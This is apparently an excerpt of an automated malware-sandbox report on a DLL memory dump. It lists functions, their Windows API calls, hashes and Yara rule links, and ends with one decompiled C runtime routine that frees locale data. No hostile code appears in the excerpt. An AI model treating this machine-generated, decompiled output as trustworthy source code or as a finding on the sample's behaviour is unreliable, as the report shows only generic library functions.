Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: fdc1c0d4537f715e6da0824748d8d68ea880b563bdff283e6b5113174bd5a98e
Instruction ID: 2a4f824a1d4c924815a83553663cbbed94f75dd3ee2a4f310f83f4737713a4c9
Opcode Fuzzy Hash: fdc1c0d4537f715e6da0824748d8d68ea880b563bdff283e6b5113174bd5a98e
Instruction Fuzzy Hash: 9831F3B590132D9BCB21DF64C8887CDBBB8AF08310F5046DAE41CA7290EB709B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 6E20966F, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6E209645,?,6E282D28,0000000C,6E20978A,?), ref: 6E209690
TerminateProcess.KERNEL32(00000000,?,6E209645,?,6E282D28,0000000C,6E20978A,?), ref: 6E209697
ExitProcess.KERNEL32 ref: 6E2096A9

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ae302e73e944e89a9a7422f089868b9fd40cfe173a8dbe067fd5a8e8b5687232
Instruction ID: f64e7c59f4dc4ffcd7e4a3af2d0d8d2a9a6fdd513a1e45d90bbabb1939eaf33d
Opcode Fuzzy Hash: ae302e73e944e89a9a7422f089868b9fd40cfe173a8dbe067fd5a8e8b5687232
Instruction Fuzzy Hash: 2DE0EC7101460DEFCF126F94CE1CE893B6FFF81656F055828F90A8A5A1CB35D952DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E077, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

EnumSystemLocalesW.KERNEL32(6E21E19F,00000001,00000000,?,; n,?,6E21E7CC,00000000,?,?,?), ref: 6E21E0E9

Strings

; n, xrefs: 6E21E07C

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: ; n
API String ID: 1084509184-3269615025
Opcode ID: edbc9b1e07a5b2dbbe8e3bb4355b84c5d5f449a7375c0578ee333f0e6ac6f4fe
Instruction ID: ff7cd032dd866caba5a61498f3cf08f6ac98f54090bd6a6c8ddfee5bf20d9320
Opcode Fuzzy Hash: edbc9b1e07a5b2dbbe8e3bb4355b84c5d5f449a7375c0578ee333f0e6ac6f4fe
Instruction Fuzzy Hash: C711293B2087055FDB189F79CC916EABBE3FF80359B18482CDA4687E40D371AA42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E21DF65, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D65E
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B n,00000000,?), ref: 6E21DFB9

Strings

)#nU, xrefs: 6E21DDD4
B n, xrefs: 6E21DE8F, 6E21DED7, 6E21DF7F
t!#nE, xrefs: 6E21DE09

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID: )#nU$B n$t!#nE
API String ID: 1663032902-4144220597
Opcode ID: d824329768e6f89fbfaa414f66456eb12c5d4c87ecee63f1925b34e3293f1011
Instruction ID: 9fde376804a4c62a85d7e39b7733fa396de6e68b3afa7ce9f0a5f10aa3aca234
Opcode Fuzzy Hash: d824329768e6f89fbfaa414f66456eb12c5d4c87ecee63f1925b34e3293f1011
Instruction Fuzzy Hash: C8F0F93265514D9BC7149EB8CC48EFA73EDDF45315F040579EA02DB280DF346E048760

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E112, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

EnumSystemLocalesW.KERNEL32(6E21E3EF,00000001,00000006,?,; n,?,6E21E790,; n,?,?,?,?,?,6E20E03B,?,?), ref: 6E21E15E

Strings

; n, xrefs: 6E21E117

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: ; n
API String ID: 1084509184-3269615025
Opcode ID: dc1e4cda7e6b8da820c475060ffd0d65cf386b815ecf44992369a78553cc8bfb
Instruction ID: 46b250078a6bc66c13a758e6c76f40245ecafbba0d3759a36cbecfc4aa6cbaac
Opcode Fuzzy Hash: dc1e4cda7e6b8da820c475060ffd0d65cf386b815ecf44992369a78553cc8bfb
Instruction Fuzzy Hash: 96F0C8762083095FD7145EB98C816AA7BD7EF8176CB19442CFA058BA40D6719D41C650

Uniqueness

Uniqueness Score: -1.00%

Function 6E214323, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,6E20DA1E,?,00000004), ref: 6E214376

Strings

GetLocaleInfoEx, xrefs: 6E214334, 6E21433E

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 6aaf9f5aaffd01085ca86afbd174e00a6c06c0f08f3029921b4dd273facb1c45
Instruction ID: 99922f08fb637848a322b39e7ae61832c89050ffb28be470b13edd124129bf39
Opcode Fuzzy Hash: 6aaf9f5aaffd01085ca86afbd174e00a6c06c0f08f3029921b4dd273facb1c45
Instruction Fuzzy Hash: D4F0F67154551CBBCF055FE08C04EAE3FE7EF09712F100414F9152A240CB314A159BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F5150, Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
Instruction ID: 3e2864bba283a895b35ee895dbacacb0ec1f53ecafc73f3638d1f52eb1c33b96
Opcode Fuzzy Hash: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
Instruction Fuzzy Hash: D0022C71E04219DFDF14CFA9D89069DBBF1EF88314F258269D919E7344E731AD429B80

Uniqueness

Uniqueness Score: -1.00%

Function 6E210396, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E210391,?,?,00000008,?,?,6E223E64,00000000), ref: 6E2105C3

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 719628c7ce87891178731f3822b44d1b4139769f25a443e0ae325ddb110d0d83
Instruction ID: 32b61e14a453f23e03aadef08789fc5896c7fa1e4c05eaa33ee0362b80a5d4f4
Opcode Fuzzy Hash: 719628c7ce87891178731f3822b44d1b4139769f25a443e0ae325ddb110d0d83
Instruction Fuzzy Hash: 8BB1CD3112420ADFD700CF68C496F957BE2FF45365F218658EAA9CF2A1D335EAA1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E3EF, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D65E
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E21E443

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 974ff0b9be3ac8b97cc82a94d1da22cecd91e46162951ac067fce07f3cf1ab6f
Instruction ID: db83ce44ef7ecfa18a7013d40d2a1effe81090938569e160aa2e62df4e9e42c4
Opcode Fuzzy Hash: 974ff0b9be3ac8b97cc82a94d1da22cecd91e46162951ac067fce07f3cf1ab6f
Instruction Fuzzy Hash: 9B21D37291820F9FDB148EA4CC41BEA77EEEF45325F10007AEE01C6544EF749A44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E61F, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6E21E3BD,00000000,00000000,?), ref: 6E21E64B

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 176d1fde5092e40b5d83c0f082086b6db58a8691f9e76c4d828f55d021ccb938
Instruction ID: 76ed556393f9211599ac9d79e54678cd2fb15e36810f77cc3da8813901341b83
Opcode Fuzzy Hash: 176d1fde5092e40b5d83c0f082086b6db58a8691f9e76c4d828f55d021ccb938
Instruction Fuzzy Hash: 8FF04E3261421B6FDB144AD48C05BFB37A9EF00395F050438DE15A3540EA70FF01CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E213952, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6E202361: EnterCriticalSection.KERNEL32(-000BFC7F,?,6E2092B1,00000000,6E282CE8,0000000C,6E20926C,?,?,?,6E20C822,?,?,6E20D6B4,00000001,00000364), ref: 6E202370

EnumSystemLocalesW.KERNEL32(6E21390C,00000001,6E283078,0000000C), ref: 6E21398A

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: bd8ce761e76cb715a82c2dc0086b23f0bed3d0a091ddcc532e1c464444f2616e
Instruction ID: 5e18f98d88dccfbc9feda49e4192307d68a0267da74677b04191b3d8db9e45f5
Opcode Fuzzy Hash: bd8ce761e76cb715a82c2dc0086b23f0bed3d0a091ddcc532e1c464444f2616e
Instruction Fuzzy Hash: BBF03776A50608EFEB00DFA8C849B9E3BE6BB06324F118416F414DB2D1CB749988EF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E00E, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

EnumSystemLocalesW.KERNEL32(6E21DF65,00000001,00000006,?,?,6E21E7EE,; n,?,?,?,?,?,6E20E03B,?,?,?), ref: 6E21E045

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 841ead18cf01e42b1fe7c2dea6d3c735095af962542bb714565547b18f5e0b34
Instruction ID: 250da9e63e9387abc5446807a1b08485c8aa4415a06400d0bc382ed226a3d624
Opcode Fuzzy Hash: 841ead18cf01e42b1fe7c2dea6d3c735095af962542bb714565547b18f5e0b34
Instruction Fuzzy Hash: 9EF0EC3930424A57C7049F75CD456AA7FE6EFC1715B06405CEF05CBA40CA759542C750

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FE079, Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 6E1FE1E9

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
Instruction ID: cb59cd0e899bcb4070c9cf19c8a974adf390c6b690242b7de602ad1ebe8b3cc3
Opcode Fuzzy Hash: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
Instruction Fuzzy Hash: B3514970748B46DBEB7089EA49607EE37DA9B62324F200D29D851C7281D645DBC7B3D3

Uniqueness

Uniqueness Score: -1.00%

Function 6E2084BB, Relevance: .7, Instructions: 669COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8523af5c97278a256f956927936cddcbb9548291b82c93668b5720af8e6ace69
Instruction ID: b8501808f738fd5949bab1aa9046edfedd602505631fbdc12d964db1ab9ab848
Opcode Fuzzy Hash: 8523af5c97278a256f956927936cddcbb9548291b82c93668b5720af8e6ace69
Instruction Fuzzy Hash: E2329174A1020FDFDB08CF98C991AEEB7B6FF85304F244168D84197399D732AA56CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E2167D9, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad039518ef56d2118089635238f558099dfcc9a986e63c19bdadbd36a58768fb
Instruction ID: 44c4814a3e3acb3c6fa94233b83d6af6faf83e8b8931da5490e8575a7ba27382
Opcode Fuzzy Hash: ad039518ef56d2118089635238f558099dfcc9a986e63c19bdadbd36a58768fb
Instruction Fuzzy Hash: 36323631D39F464EDB235534C872329A39AAFA73C5F11D727E81AB5999EB29C1C38100

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3E00, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 62d9834b5084233973cdf5e1f53444753aec69ede6b5336bfaec016ed60989cb
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: EC112E7724088387D28085EDC4BC6B7A395EBF5224739437AF0614BE78D22391C7B600

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A16BC, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35e9e3e5d68cc11bdb6d44c51992b12131a227f84c1c9e110661571886fff2e7
Instruction ID: e6044ee39ba263383f897c9a93bd86c064cbe34a7595b3165d957f2a605ab1f0
Opcode Fuzzy Hash: 35e9e3e5d68cc11bdb6d44c51992b12131a227f84c1c9e110661571886fff2e7
Instruction Fuzzy Hash: BEF0A035300644DFD704CF58C840F2AB7E8FB09B00F14416DE926CB791DB71E804CA50

Uniqueness

Uniqueness Score: -1.00%

Function 6E21BF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E21BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e2850b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E20CBD3(_t46);
							E6E21C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E20CBD3(_t47);
							E6E21CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E20CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6E20CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E21C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e2852b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E20CBD3(_t31);
							E6E20CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E20CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E20CBD3(_t74);
			}

0x6e21bf6c
0x6e21bf70
0x6e21bf78
0x6e21bf81
0x6e21bf86
0x6e21bf8d
0x6e21bf95
0x6e21bf9d
0x6e21bfa8
0x6e21bfae
0x6e21bfaf
0x6e21bfb7
0x6e21bfbf
0x6e21bfca
0x6e21bfd0
0x6e21bfd4
0x6e21bfdf
0x6e21bfe5
0x6e21bf86
0x6e21bfe6
0x6e21bfee
0x6e21c001
0x6e21c014
0x6e21c022
0x6e21c02d
0x6e21c032
0x6e21c03b
0x6e21c043
0x6e21c044
0x6e21c044
0x6e21c04a
0x6e21c04d
0x6e21c04d
0x6e21c050
0x6e21c057
0x6e21c059
0x6e21c05d
0x6e21c065
0x6e21c06c
0x6e21c072
0x6e21c073
0x6e21c073
0x6e21c07a
0x6e21c07c
0x6e21c081
0x6e21c089
0x6e21c08e
0x6e21c08f
0x6e21c08f
0x6e21c092
0x6e21c095
0x6e21c098
0x6e21c09b
0x6e21c09b
0x6e21c0ad

APIs

___free_lconv_mon.LIBCMT ref: 6E21BFA8

